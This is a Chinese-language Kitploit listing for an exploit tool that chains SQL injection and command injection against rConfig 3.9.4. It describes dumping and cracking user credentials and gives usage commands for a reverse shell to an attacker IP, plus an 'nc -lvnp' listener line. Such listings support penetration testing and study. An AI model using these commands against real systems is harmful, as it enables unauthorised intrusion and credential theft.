Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rConfig_rce — rConfig 的组合 PoC:SQL 注入 (CVE-2020-10220) 与命令注入 (CVE-2020-10879) | Kitploit
工具/GitHubGitHub/cspanias/rconfig_rce
密码破解漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubcspanias/rconfig_rce

rConfig_rce

rConfig 的组合 PoC:SQL 注入 (CVE-2020-10220) 与命令注入 (CVE-2020-10879)

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

rConfig 3.9 组合SQL注入与命令注入PoC

概述

该PoC针对rConfig版本3.9.4,演示了通过SQL注入和远程命令注入漏洞的组合利用。它自动化了以下过程:

  1. 通过SQLi提取数据库名称
  2. 从数据库转储用户凭据
  3. 尝试使用hashcat配合rockyou字典和best64.rules规则破解密码哈希
  4. 可选地,利用破解的管理员凭据,通过搜索功能上的命令注入执行远程命令执行(RCE)

此脚本基于并整合了两个原始PoC:

  • 48208.py(SQL注入)作者:vikingfr
  • 48241.py(命令注入)作者:Matthew Aberegg 和 Michael Burkey

它被修改以自动化破解和可选的shell生成。

要求

  • Python 3
  • requests库(pip install requests)
  • hashcat已安装并可通过命令行访问
  • rockyou.txt字典(或等效文件)位于/usr/share/wordlists/rockyou.txt
  • hashcat规则文件/usr/share/hashcat/rules/best64.rule

用法

仅转储用户和哈希:

root@kitploit:~
python3 rConfig_rce.py https://target

转储用户、破解密码并尝试RCE(需要攻击者IP和端口用于反弹shell):

root@kitploit:~
python3 rConfig_rce.py https://target attacker_ip attacker_port

备注

  • 如果hashcat无法破解密码,脚本建议使用在线破解服务,例如CrackStation。
  • 如果密码哈希无法自动破解,系统将提示您手动输入明文密码以进行RCE尝试。
  • 脚本优先使用admin帐户进行命令注入阶段。
  • 确保在攻击者机器上运行监听器(例如nc -lvnp 80)来捕获反弹shell。

免责声明

此工具仅供授权的安全测试和教育目的使用。未经许可对系统进行未授权使用是违法且不道德的。

下载工具